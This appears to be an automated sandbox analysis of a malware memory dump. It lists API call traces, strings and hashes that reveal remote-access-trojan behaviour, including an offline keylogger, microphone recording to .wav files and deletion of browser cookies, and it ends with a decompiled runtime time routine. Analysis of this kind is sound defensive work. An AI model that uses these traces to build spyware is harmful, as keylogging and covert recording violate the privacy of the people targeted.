                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 006D4ED2
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006D4F85
                                    • CreateThread.KERNEL32 ref: 006D4F98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Create$EventLocalThreadTime
                                    • String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i
                                    • API String ID: 2532271599-119634454
                                    • Opcode ID: b0074aa9011ade61b4e6c1ad1b99b11d7209604f6ab817483ac39f43a537a403
                                    • Instruction ID: abdd483e15e28d7ead19f66a5441e6d918d6a19af2012d7b6de192b5262cf3f2
                                    • Opcode Fuzzy Hash: b0074aa9011ade61b4e6c1ad1b99b11d7209604f6ab817483ac39f43a537a403
                                    • Instruction Fuzzy Hash: A0319061C00254BACB60ABA5CC09DFFBBFDAF95705F04041FF44296291EA789E45D774
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _strftime.LIBCMT ref: 006D1D34
                                      • Part of subcall function 006D1A64: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1ACC
                                    • waveInUnprepareHeader.WINMM(0073BA78,00000020,00000000,?), ref: 006D1DE6
                                    • waveInPrepareHeader.WINMM(0073BA78,00000020), ref: 006D1E24
                                    • waveInAddBuffer.WINMM(0073BA78,00000020), ref: 006D1E33
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                    • String ID: %Y-%m-%d %H.%M$.wav
                                    • API String ID: 3809562944-3597965672
                                    • Opcode ID: 1fb5927e799b7da869af5857a5e0772711ebfa204c0de47421f662cf19b0828d
                                    • Instruction ID: a814e69317ac829edea34c97351dd250640da69f64a94a921b02ac3eabbe4ee1
                                    • Opcode Fuzzy Hash: 1fb5927e799b7da869af5857a5e0772711ebfa204c0de47421f662cf19b0828d
                                    • Instruction Fuzzy Hash: F931C331908740AFD354FF60EC52A9E77EAEB95300F00C42EF6568A6A1EF745A05CB5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 006E08E2: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 006E0904
                                      • Part of subcall function 006E08E2: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 006E0923
                                      • Part of subcall function 006E08E2: RegCloseKey.ADVAPI32(?), ref: 006E092C
                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 006DA48B
                                    • PathFileExistsA.SHLWAPI(?), ref: 006DA498
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                    • API String ID: 1133728706-4073444585
                                    • Opcode ID: db4bd81efd6bb1ccbed5368a9b52a515525edb5282113b1438ef73e8be045522
                                    • Instruction ID: 802556b00ea74b3a7875d26bad42e09d8c043d3a4746b57b8873ae608ccde987
                                    • Opcode Fuzzy Hash: db4bd81efd6bb1ccbed5368a9b52a515525edb5282113b1438ef73e8be045522
                                    • Instruction Fuzzy Hash: 22217171D041156ACB54FBF0DC6ACFE77BA9F15300F44012EF90197392FEA49A4A8696
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: be1c5314b538dd1861600ff922d2b6575b4c48126bbc8be76458352259e04b4d
                                    • Instruction ID: 749be5051e46d30b4adbd698ec6b0bce3682118c6f7167c196ee14a2a683dfd7
                                    • Opcode Fuzzy Hash: be1c5314b538dd1861600ff922d2b6575b4c48126bbc8be76458352259e04b4d
                                    • Instruction Fuzzy Hash: 9111E472504269FBCB202F75AC0D96B7AECFF86720B104625F819C7192DA3C8901C6B0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006DE7F2
                                    • int.LIBCPMT ref: 006DE805
                                      • Part of subcall function 006DB94C: std::_Lockit::_Lockit.LIBCPMT ref: 006DB95D
                                      • Part of subcall function 006DB94C: std::_Lockit::~_Lockit.LIBCPMT ref: 006DB977
                                    • std::locale::_Getfacet.LIBCPMT ref: 006DE80E
                                    • std::_Facet_Register.LIBCPMT ref: 006DE845
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006DE84E
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 006DE86C
                                    • __Init_thread_footer.LIBCMT ref: 006DE8AD
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
                                    • String ID:
                                    • API String ID: 2409581025-0
                                    • Opcode ID: a8053ce255f0b52ba33aab255b3da65f308baa6d68d4d1915461b8e301fa42e5
                                    • Instruction ID: bb4a4970f5737cda1c1551ead93a4dc30bd3dfa5f341c988e426e350e95438a1
                                    • Opcode Fuzzy Hash: a8053ce255f0b52ba33aab255b3da65f308baa6d68d4d1915461b8e301fa42e5
                                    • Instruction Fuzzy Hash: 19212676D00114DBD720FB68E846AAD73AA9F04320F21016FF904AB3D2DF359D0187D9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,0073C350), ref: 006D9642
                                      • Part of subcall function 006D9E69: char_traits.LIBCPMT ref: 006D9E79
                                    • wsprintfW.USER32 ref: 006D96C3
                                    • SetEvent.KERNEL32(00000000,00000000), ref: 006D96ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: EventLocalTimechar_traitswsprintf
                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                    • API String ID: 3003339404-248792730
                                    • Opcode ID: a52e5813f2f747f2b4ce531d71c8f775f32adbb8543882659b1f440384f717f3
                                    • Instruction ID: 4c325c58706c121a6c21b3d2e2d85b29c02636bb686fae60f2d7dc0dead98fe3
                                    • Opcode Fuzzy Hash: a52e5813f2f747f2b4ce531d71c8f775f32adbb8543882659b1f440384f717f3
                                    • Instruction Fuzzy Hash: 3021B372804118BAC728EBA4EC55CFF77FAAF44700F00412FF80256291EE78AA46C768
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0073BACC,?,?,?,?,?,?,?,?,?,?,?,006E35C0), ref: 006E6F2C
                                    • GetProcAddress.KERNEL32(00000000), ref: 006E6F33
                                    • Sleep.KERNEL32(000003E8,?,0073BACC,?,?,?,?,?,?,?,?,?,?,?,006E35C0,00000095), ref: 006E6F4E
                                    • __aulldiv.LIBCMT ref: 006E6FC2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProcSleep__aulldiv
                                    • String ID: GetSystemTimes$kernel32.dll
                                    • API String ID: 482274533-1354958348
                                    • Opcode ID: bbe31ac77077b3d8b17d6195696c794d76d112345c83863fcee79fb8f2cd296a
                                    • Instruction ID: 11a9b3c7ff035bb9a97f7e2b8b1953cbe063386393d71a94cb11a5e00b68e236
                                    • Opcode Fuzzy Hash: bbe31ac77077b3d8b17d6195696c794d76d112345c83863fcee79fb8f2cd296a
                                    • Instruction Fuzzy Hash: D0117573E01328AAC714A7F5DC95DEF7B7DAB54750F040625F506A3141ED385A0886E4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.KERNEL32(i]m,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,006E7A71,00000000,00000000), ref: 006E7986
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,006E7A71,00000000,00000000,00000000,00000004,?,006D5D69,00000000), ref: 006E79A2
                                    • CloseHandle.KERNEL32(00000000,?,006E7A71,00000000,00000000,00000000,00000004,?,006D5D69,00000000), ref: 006E79AE
                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,006E7A71,00000000,00000000,00000000,00000004,?,006D5D69,00000000), ref: 006E79C0
                                    • CloseHandle.KERNEL32(00000000,?,006E7A71,00000000,00000000,00000000,00000004,?,006D5D69,00000000), ref: 006E79CD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreatePointerWrite
                                    • String ID: i]m
                                    • API String ID: 1852769593-2219906881
                                    • Opcode ID: 51f6c9d3f3391bdc76662e4684612698d5b6174b91e5ee2164b01d1b3beef5a9
                                    • Instruction ID: 00ee93dfaac86c54de6cc79dab2ddeb0083c51bcdd99df753968cdd5f6fca47e
                                    • Opcode Fuzzy Hash: 51f6c9d3f3391bdc76662e4684612698d5b6174b91e5ee2164b01d1b3beef5a9
                                    • Instruction Fuzzy Hash: 6B110271206258BFEB204F669C89EFA77AEEF06370F108225FA15D6281C6349E019678
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00718EC1: _free.LIBCMT ref: 00718EEA
                                    • _free.LIBCMT ref: 007191C8
                                      • Part of subcall function 007101F5: HeapFree.KERNEL32(00000000,00000000,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?), ref: 0071020B
                                      • Part of subcall function 007101F5: GetLastError.KERNEL32(?,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?,?), ref: 0071021D
                                    • _free.LIBCMT ref: 007191D3
                                    • _free.LIBCMT ref: 007191DE
                                    • _free.LIBCMT ref: 00719232
                                    • _free.LIBCMT ref: 0071923D
                                    • _free.LIBCMT ref: 00719248
                                    • _free.LIBCMT ref: 00719253
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
                                    • Instruction ID: b90f13c2f23b718eb27c38f178b14e286feb3bfee60a145b8ee0378c5c385586
                                    • Opcode Fuzzy Hash: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
                                    • Instruction Fuzzy Hash: 7311EA72950B08FADB60BBB4CC4EFCF7798AF04700F404815B399664D2DF7DA5985691
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLastError.KERNEL32(?,?,007050AC,007021F2), ref: 007050C3
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007050D1
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007050EA
                                    • SetLastError.KERNEL32(00000000,?,007050AC,007021F2), ref: 0070513C
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 8772fae84b21205c42a4a3bd75c1885f9c5693c0e6472c7399b13e26cb9e3a02
                                    • Instruction ID: 0c0faa191632c878a3ec32b16db219b1490bb5c8b29ea5b9302f2acc77b07d5b
                                    • Opcode Fuzzy Hash: 8772fae84b21205c42a4a3bd75c1885f9c5693c0e6472c7399b13e26cb9e3a02
                                    • Instruction Fuzzy Hash: 0C01D432249B15EEF7292B78BD8AB2B2AD5DB02375720432DF114811F1FF5D4C416A98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 006D9FBF
                                    • GetLastError.KERNEL32 ref: 006D9FC9
                                    Strings
                                    • [Chrome Cookies not found], xrefs: 006D9FE3
                                    • UserProfile, xrefs: 006D9F8F
                                    • [Chrome Cookies found, cleared!], xrefs: 006D9FEF
                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 006D9F8A
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                    • API String ID: 2018770650-304995407
                                    • Opcode ID: e8a52d19a8714a142837f78582a1b24a36b8848d6cefa2ee7663c8b95ce166a1
                                    • Instruction ID: 188705b99c773f75dede832aeaff157ae4fbac08585f5acaa3640192da5d8e30
                                    • Opcode Fuzzy Hash: e8a52d19a8714a142837f78582a1b24a36b8848d6cefa2ee7663c8b95ce166a1
                                    • Instruction Fuzzy Hash: 0001F971E44109A78B08BBB4DD6B8FE7B66B912300740022FF802D73D2FD594A46C6E6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0073C138,?,006D4CA9,00000001,0073C138,006D4C56,00000000,00000000,00000000), ref: 006D5159
                                    • SetEvent.KERNEL32(?,?,006D4CA9,00000001,0073C138,006D4C56,00000000,00000000,00000000), ref: 006D5165
                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,006D4CA9,00000001,0073C138,006D4C56,00000000,00000000,00000000), ref: 006D5170
                                    • CloseHandle.KERNEL32(?,?,006D4CA9,00000001,0073C138,006D4C56,00000000,00000000,00000000), ref: 006D5179
                                      • Part of subcall function 006E6C80: GetLocalTime.KERNEL32(00000000), ref: 006E6C9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                    • String ID: Connection KeepAlive disabled$[WARNING]
                                    • API String ID: 2993684571-804309475
                                    • Opcode ID: c7f2335c27b104e09a484ba2b673c05c100170ddefd6be4cffa2bcd6555367f5
                                    • Instruction ID: d680f73248868285d16f0f2f734251f28857b37de6ea857a3f21075500c4aa46
                                    • Opcode Fuzzy Hash: c7f2335c27b104e09a484ba2b673c05c100170ddefd6be4cffa2bcd6555367f5
                                    • Instruction Fuzzy Hash: 71F0F671900350BFDB203BB49C0EA767FA9EB05324F00452EF94282771CA7999518796
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 006E6C80: GetLocalTime.KERNEL32(00000000), ref: 006E6C9A
                                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 006E6769
                                    • PlaySoundW.WINMM(00000000,00000000), ref: 006E6777
                                    • Sleep.KERNEL32(00002710), ref: 006E677E
                                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 006E6787
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: PlaySound$HandleLocalModuleSleepTime
                                    • String ID: Alarm has been triggered!$[ALARM]
                                    • API String ID: 614609389-1190268461
                                    • Opcode ID: 0cd0e7c6f4f6b8726bfed379cc72c0b094954ec7f07a6466dc6ee010a5cea6c0
                                    • Instruction ID: 30987be9cadbd04ed707fcbf7105871aec04620e549b35582424e1550535f328
                                    • Opcode Fuzzy Hash: 0cd0e7c6f4f6b8726bfed379cc72c0b094954ec7f07a6466dc6ee010a5cea6c0
                                    • Instruction Fuzzy Hash: 22E0DF22B00161BB552033BAAC0FD6F7D29DFCAB70B01015EFA0466292CD580902C3F6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __allrem.LIBCMT ref: 00705926
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00705942
                                    • __allrem.LIBCMT ref: 00705959
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00705977
                                    • __allrem.LIBCMT ref: 0070598E
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007059AC
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: 72cb9584bf9c46cebf665fcacbcb8dac0ae959ede31be18aeb0c43964b5390ae
                                    • Instruction ID: 741b86479768827e83b1e59b85b27bc073641e8f79aad9786231157893a360b2
                                    • Opcode Fuzzy Hash: 72cb9584bf9c46cebf665fcacbcb8dac0ae959ede31be18aeb0c43964b5390ae
                                    • Instruction Fuzzy Hash: 6B81D772A10F16DBE7209A68CC46B6B73E9AF40774F24872AF511D66C1E77CE9408F90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 70%
                                    			E105C660C(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
                                    				intOrPtr _v0;
                                    				char _v8;
                                    				signed int _v12;
                                    				char _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t61;
                                    				void* _t64;
                                    				signed int _t67;
                                    				signed int _t69;
                                    				signed int _t70;
                                    				signed int _t73;
                                    				signed int _t76;
                                    				intOrPtr _t78;
                                    				signed int _t79;
                                    				void* _t80;
                                    				signed int _t82;
                                    				void* _t83;
                                    				signed int _t85;
                                    				signed int _t91;
                                    				signed int _t100;
                                    				void* _t102;
                                    				signed int _t105;
                                    				signed int* _t108;
                                    				signed int* _t109;
                                    				intOrPtr* _t111;
                                    				signed int _t116;
                                    				signed int _t118;
                                    				signed int _t121;
                                    				void* _t123;
                                    				signed int _t126;
                                    				signed int _t129;
                                    				signed int _t137;
                                    				signed int _t143;
                                    				void _t145;
                                    				void* _t146;
                                    				void* _t148;
                                    				void* _t150;
                                    				signed int _t151;
                                    				signed int _t152;
                                    				void* _t153;
                                    				signed int _t154;
                                    				signed int _t155;
                                    				signed int _t156;
                                    				intOrPtr _t157;
                                    
                                    				_t137 = __edx;
                                    				_t153 = _a4;
                                    				if(_t153 == 0) {
                                    					_t111 = E105CB377();
                                    					_t157 = 0x16;
                                    					 *_t111 = _t157;
                                    					E105C77D0();
                                    					return _t157;
                                    				}
                                    				_push(__edi);
                                    				_t121 = 9;
                                    				memset(_t153, _t61 | 0xffffffff, _t121 << 2);
                                    				_t143 = _a8;
                                    				__eflags = _t143;
                                    				if(_t143 == 0) {
                                    					_t109 = E105CB377();
                                    					_t156 = 0x16;
                                    					 *_t109 = _t156;
                                    					E105C77D0();
                                    					_t76 = _t156;
                                    					L12:
                                    					return _t76;
                                    				}
                                    				_push(__ebx);
                                    				__eflags =  *(_t143 + 4);
                                    				if(__eflags <= 0) {
                                    					if(__eflags < 0) {
                                    						L10:
                                    						_t108 = E105CB377();
                                    						_t155 = 0x16;
                                    						 *_t108 = _t155;
                                    						_t76 = _t155;
                                    						L11:
                                    						goto L12;
                                    					}
                                    					__eflags =  *_t143;
                                    					if( *_t143 < 0) {
                                    						goto L10;
                                    					}
                                    				}
                                    				_t64 = 7;
                                    				__eflags =  *(_t143 + 4) - _t64;
                                    				if(__eflags >= 0) {
                                    					if(__eflags > 0) {
                                    						goto L10;
                                    					}
                                    					__eflags =  *_t143 - 0x93406fff;
                                    					if(__eflags > 0) {
                                    						goto L10;
                                    					}
                                    				}
                                    				L105D3F11(0, _t143, _t153, __eflags);
                                    				_v12 = 0;
                                    				_v16 = 0;
                                    				_v8 = 0;
                                    				_t67 = E105D3746( &_v12);
                                    				_pop(_t123);
                                    				__eflags = _t67;
                                    				if(_t67 == 0) {
                                    					_t67 = E105D3772( &_v16);
                                    					_pop(_t123);
                                    					__eflags = _t67;
                                    					if(_t67 == 0) {
                                    						_t67 = E105D379E( &_v8);
                                    						_pop(_t123);
                                    						__eflags = _t67;
                                    						if(_t67 == 0) {
                                    							_t116 =  *(_t143 + 4);
                                    							_t126 =  *_t143;
                                    							__eflags = _t116;
                                    							if(__eflags < 0) {
                                    								L28:
                                    								_push(_t143);
                                    								_push(_t153);
                                    								_t76 = E105CD54A();
                                    								__eflags = _t76;
                                    								if(_t76 != 0) {
                                    									goto L11;
                                    								}
                                    								__eflags = _v12;
                                    								asm("cdq");
                                    								_t145 =  *_t153;
                                    								_t118 = _t137;
                                    								if(__eflags == 0) {
                                    									L32:
                                    									_t78 = _v8;
                                    									L33:
                                    									asm("cdq");
                                    									_t146 = _t145 - _t78;
                                    									asm("sbb ebx, edx");
                                    									_t79 = L105E1AE3(_t146, _t118, 0x3c, 0);
                                    									 *_t153 = _t79;
                                    									__eflags = _t79;
                                    									if(_t79 < 0) {
                                    										_t146 = _t146 + 0xffffffc4;
                                    										 *_t153 = _t79 + 0x3c;
                                    										asm("adc ebx, 0xffffffff");
                                    									}
                                    									_t80 = L105E1A33(_t146, _t118, 0x3c, 0);
                                    									_t119 = _t137;
                                    									_t28 = _t153 + 4; // 0x848d0045
                                    									asm("cdq");
                                    									_t148 = _t80 +  *_t28;
                                    									asm("adc ebx, edx");
                                    									_t82 = L105E1AE3(_t148, _t137, 0x3c, 0);
                                    									 *(_t153 + 4) = _t82;
                                    									__eflags = _t82;
                                    									if(_t82 < 0) {
                                    										_t148 = _t148 + 0xffffffc4;
                                    										 *(_t153 + 4) = _t82 + 0x3c;
                                    										asm("adc ebx, 0xffffffff");
                                    									}
                                    									_t83 = L105E1A33(_t148, _t119, 0x3c, 0);
                                    									_t120 = _t137;
                                    									_t31 = _t153 + 8; // 0xa824
                                    									asm("cdq");
                                    									_t150 = _t83 +  *_t31;
                                    									asm("adc ebx, edx");
                                    									_t85 = L105E1AE3(_t150, _t137, 0x18, 0);
                                    									 *(_t153 + 8) = _t85;
                                    									__eflags = _t85;
                                    									if(_t85 < 0) {
                                    										_t150 = _t150 + 0xffffffe8;
                                    										 *(_t153 + 8) = _t85 + 0x18;
                                    										asm("adc ebx, 0xffffffff");
                                    									}
                                    									_t129 = L105E1A33(_t150, _t120, 0x18, 0);
                                    									__eflags = _t137;
                                    									if(__eflags < 0) {
                                    										L48:
                                    										_t44 = _t153 + 0x18; // 0xa024848d
                                    										 *(_t153 + 0xc) =  *(_t153 + 0xc) + _t129;
                                    										asm("cdq");
                                    										_t151 = 7;
                                    										_t51 = _t153 + 0xc; // 0x50506a00
                                    										_t91 =  *_t51;
                                    										 *(_t153 + 0x18) = ( *_t44 + 7 + _t129) % _t151;
                                    										__eflags = _t91;
                                    										if(_t91 > 0) {
                                    											goto L43;
                                    										}
                                    										 *((intOrPtr*)(_t153 + 0x10)) = 0xb;
                                    										 *(_t153 + 0xc) = _t91 + 0x1f;
                                    										_t55 = _t129 + 0x16d; // 0x16d
                                    										 *(_t153 + 0x1c) =  *(_t153 + 0x1c) + _t55;
                                    										 *((intOrPtr*)(_t153 + 0x14)) =  *((intOrPtr*)(_t153 + 0x14)) - 1;
                                    										goto L44;
                                    									} else {
                                    										if(__eflags > 0) {
                                    											L42:
                                    											_t34 = _t153 + 0x18; // 0xa024848d
                                    											asm("cdq");
                                    											_t152 = 7;
                                    											_t39 = _t153 + 0xc;
                                    											 *_t39 =  *(_t153 + 0xc) + _t129;
                                    											__eflags =  *_t39;
                                    											 *(_t153 + 0x18) = ( *_t34 + _t129) % _t152;
                                    											L43:
                                    											_t42 = _t153 + 0x1c;
                                    											 *_t42 =  *(_t153 + 0x1c) + _t129;
                                    											__eflags =  *_t42;
                                    											L44:
                                    											_t76 = 0;
                                    											goto L11;
                                    										}
                                    										__eflags = _t129;
                                    										if(_t129 == 0) {
                                    											__eflags = _t137;
                                    											if(__eflags > 0) {
                                    												goto L44;
                                    											}
                                    											if(__eflags < 0) {
                                    												goto L48;
                                    											}
                                    											__eflags = _t129;
                                    											if(_t129 >= 0) {
                                    												goto L44;
                                    											}
                                    											goto L48;
                                    										}
                                    										goto L42;
                                    									}
                                    								}
                                    								_push(_t153);
                                    								_t100 = L105D3F62(_t118, _t145, _t153, __eflags);
                                    								__eflags = _t100;
                                    								if(_t100 == 0) {
                                    									goto L32;
                                    								}
                                    								_t78 = _v8 + _v16;
                                    								 *((intOrPtr*)(_t153 + 0x20)) = 1;
                                    								goto L33;
                                    							}
                                    							if(__eflags > 0) {
                                    								L20:
                                    								_t102 = 7;
                                    								__eflags = _t116 - _t102;
                                    								if(__eflags > 0) {
                                    									goto L28;
                                    								}
                                    								if(__eflags < 0) {
                                    									L23:
                                    									asm("cdq");
                                    									_push( &_v24);
                                    									asm("sbb ebx, edx");
                                    									_v24 = _t126 - _v8;
                                    									_push(_t153);
                                    									_v20 = _t116;
                                    									_t76 = E105CD54A();
                                    									__eflags = _t76;
                                    									if(_t76 != 0) {
                                    										goto L11;
                                    									}
                                    									__eflags = _v12 - _t76;
                                    									if(__eflags == 0) {
                                    										goto L44;
                                    									}
                                    									_push(_t153);
                                    									_t105 = L105D3F62(_t116, _t143, _t153, __eflags);
                                    									__eflags = _t105;
                                    									if(_t105 == 0) {
                                    										goto L44;
                                    									}
                                    									asm("cdq");
                                    									_v24 = _v24 - _v16;
                                    									_push( &_v24);
                                    									asm("sbb [ebp-0x10], edx");
                                    									_push(_t153);
                                    									_t76 = E105CD54A();
                                    									__eflags = _t76;
                                    									if(_t76 != 0) {
                                    										goto L11;
                                    									}
                                    									 *((intOrPtr*)(_t153 + 0x20)) = 1;
                                    									goto L44;
                                    								}
                                    								__eflags = _t126 - 0x933c7b7f;
                                    								if(_t126 >= 0x933c7b7f) {
                                    									goto L28;
                                    								}
                                    								goto L23;
                                    							}
                                    							__eflags = _t126 - 0x3f480;
                                    							if(_t126 <= 0x3f480) {
                                    								goto L28;
                                    							}
                                    							goto L20;
                                    						}
                                    					}
                                    				}
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				E105C77FD(_t67);
                                    				asm("int3");
                                    				_push(_t153);
                                    				_t69 = E105CD4E5(_t123);
                                    				_t154 = _t69;
                                    				__eflags = _t154;
                                    				if(_t154 != 0) {
                                    					_push(_v0);
                                    					_t70 = E105C660C(0, _t137, _t143, _t154);
                                    					asm("sbb eax, eax");
                                    					_t73 =  !( ~_t70) & _t154;
                                    					__eflags = _t73;
                                    					return _t73;
                                    				}
                                    				return _t69;
                                    			}
                                    0x105c67d1
                                    0x105c67d4
                                    0x105c67d6
                                    0x105c67db
                                    0x105c67de
                                    0x105c67e1
                                    0x105c67e1
                                    0x105c67ea
                                    0x105c67f1
                                    0x105c67f3
                                    0x105c67f6
                                    0x105c67f7
                                    0x105c67fd
                                    0x105c6801
                                    0x105c6806
                                    0x105c6809
                                    0x105c680b
                                    0x105c6810
                                    0x105c6813
                                    0x105c6816
                                    0x105c6816
                                    0x105c6824
                                    0x105c6826
                                    0x105c6828
                                    0x105c6855
                                    0x105c6855
                                    0x105c685b
                                    0x105c6862
                                    0x105c6863
                                    0x105c6866
